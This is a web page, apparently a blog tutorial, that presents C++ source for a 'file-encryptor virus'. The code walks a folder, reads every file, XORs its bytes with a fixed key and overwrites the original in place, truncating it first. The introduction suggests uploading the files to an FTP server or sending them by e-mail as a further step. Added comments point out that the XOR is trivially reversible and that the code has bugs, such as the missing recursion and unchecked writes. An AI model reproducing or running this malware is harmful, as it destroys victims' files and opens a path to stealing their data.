Encrypting the content of files via a file infector.

 


A file-encryptor virus is a type of infector that changes the content of files by overwriting it in encrypted form.
The overwritten files are uploaded to a server (FTP, ...), where the attacker downloads them and edits the content using a decryptor.

  Algorithm:
     - Recursively go through the specified folder(s) or all of their subfolders.
     - If a file is found in the folder, open it and load all lines into the buffer.
     - Encrypt the data buffer holding the content of the found file with the algorithm and store the result in a buffer.
     - Save the encrypted buffer contents back to the file.

The algorithm can be supplemented by other steps, such as uploading to an FTP server, sending by e-mail, and so on.


Libraries:

  

  #include "Convert.h" //https://www.netbot.sk/en/14-blog-headers/86-convert-h-en
  #include "WinAPI.h" //https://www.netbot.sk/en/14-blog-headers/44-winapi-en
  #include <iterator>
  #include <iostream>
  #include <fstream>
  #include <vector>
  #include <dirent.h> //http://softagalleria.net/dirent.php
  #include <string>



Function for recursively searching a folder for files:

  
  // Enumerates the entries of `locatefolder` and, for every entry that
  // IsDirectory() reports as not being a directory, prints its path and runs
  // GetFileContent -> EncryptData -> SaveContent on it.
  //
  // locatefolder: path handed to opendir() and used as the prefix that each
  //               entry name is appended to when the full path is built.
  //
  // NOTE(review): in this listing, entries for which IsDirectory() returns
  // true are simply skipped; no nested ListFiles call is visible here, so as
  // shown only the entries of the one folder are processed. IsDirectory() is
  // defined elsewhere and not shown.
  //
  // Analysis note: the activity this produces is a directory enumeration
  // followed, per file, by a full read and an in-place rewrite of the same
  // path, plus one stdout line per processed file.
  void ListFiles(const char * locatefolder)
  {
       if(this->directory=::opendir(locatefolder))
       {
           //Iterate over the directory entries until readdir() returns null.//
           while(entry = ::readdir(this->directory))
           {
               //Skip the "." and ".." pseudo-entries.//
               if(::strcmp(entry->d_name,".")!=0 && ::strcmp(entry->d_name,"..")!=0)
               {
                   //Build the entry's path in pathbuffer: folder path first, then the entry name.//
                   ::strncpy(this->pathbuffer, locatefolder, sizeof(this->pathbuffer));
                   ::strncat(this->pathbuffer, entry->d_name, sizeof(this->pathbuffer));

                   //Only continue when stat() succeeds on the built path.//
                   if(::stat(this->pathbuffer,&this->status) == 0)
                   {
                       if(!this->IsDirectory((const char*)this->pathbuffer))
                       {
                            //Print the path of each non-directory entry.//
                            ::std::cout << this->pathbuffer << "\n";

                            //Per-file sequence: load content, XOR it, write it back over the file.//
                            this->GetFileContent(this->pathbuffer);
                            this->EncryptData();
                            this->SaveContent();
                       }
                   }
               }
            }

            ::closedir(this->directory);
       }
   }



Function for loading the content of the file into the buffer:

  
 // Loads the whole of `filename` into this->contents (binary mode) and
 // returns a copy of it.
 //
 // filename: path of the file to read; it is also stored in
 //           this->inputfilename and this->inputfilename_ (the latter is the
 //           path SaveContent later passes to CreateFileA).
 //
 // NOTE(review): when the stream fails to open, no return statement is
 // reached and this->contents is left untouched, so it still holds whatever
 // the previous call loaded while inputfilename_ already names the new file.
 // For incident response this means an affected file is not guaranteed to
 // contain an XOR of its own original bytes -- confirm per file.
 ::std::string GetFileContent(const char *filename)
   {
       this->inputfilename = filename;
       this->inputfilename_ = filename;

       //Open the file for binary reading.//
       ::std::ifstream read(filename, std::ios::in | std::ios::binary);
       if (read)
       {
           //Seek to the end to learn the size, size the buffer, then read everything from the start.//
           read.seekg(0, ::std::ios::end);
           this->contents.resize(read.tellg());
           read.seekg(0, ::std::ios::beg);
           read.read(&this->contents[0], this->contents.size());
           read.close();
           return this->contents;
       }
   }



Function for encrypting data buffer content:

  
  // Copies this->contents into this->encryptcontents, XORs every byte of the
  // copy with the constant 'K', and returns the result.
  //
  // Analysis note: a single fixed byte is the only key material in this
  // listing, and XOR with a constant is its own inverse -- applying the same
  // operation to the output gives back the input. This is reversible
  // obfuscation rather than cryptographic encryption, so data that was
  // written out completely can be restored without any secret.
  ::std::string EncryptData(void) 
   {
       //Hard-coded one-byte key.//
       char key = 'K';
       this->encryptcontents = this->contents;

        //Byte-wise XOR of the whole buffer with the key.//
        for (int i = 0; i < this->encryptcontents.size(); i++)
        {
            this->encryptcontents[i] = this->encryptcontents[i] ^ key;
        }
        return this->encryptcontents;
   }



Saving encrypted data buffer content to the file:

  
// Writes this->encryptcontents over the file named by this->inputfilename_.
//
// The buffer is first copied into a freshly allocated, NUL-terminated char
// array (this->encrypteddata). The file is then opened with CreateFileA using
// GENERIC_WRITE, share mode 0 and TRUNCATE_EXISTING, and
// encryptcontents.size() bytes are passed to WriteFile.
//
// Analysis notes:
//  - TRUNCATE_EXISTING cuts the existing file to zero length when it is
//    opened, so the original bytes on disk are gone before the write starts;
//    this listing keeps no backup copy.
//  - Neither the CreateFileA handle nor the WriteFile result is checked, so a
//    failed write can leave an empty file instead of an XOR-ed one.
//  - The file keeps its name and path; a change shows up in content/integrity
//    checks (e.g. file headers no longer matching the file type), not as a
//    rename or new extension.
//  - No CloseHandle or delete[] for handlefile / encrypteddata appears in this
//    listing.
void SaveContent(void)
   {
       //Copy the std::string into a newly allocated, NUL-terminated char array.//
       this->encrypteddata = new char[this->encryptcontents.size() + 1];
       copy(this->encryptcontents.begin(),this->encryptcontents.end(),this->encrypteddata);
       this->encrypteddata[this->encryptcontents.size()] = '\0'; 

       //Open the original path for writing (truncating it) and write the XOR-ed bytes.//
       this->handlefile = ::CreateFileA(this->inputfilename_, GENERIC_WRITE, 0, NULL, 
TRUNCATE_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); ::WriteFile(this->handlefile, this->encrypteddata, encryptcontents.size(), 0, NULL); }




  

The video encryptor I have designed can be found here: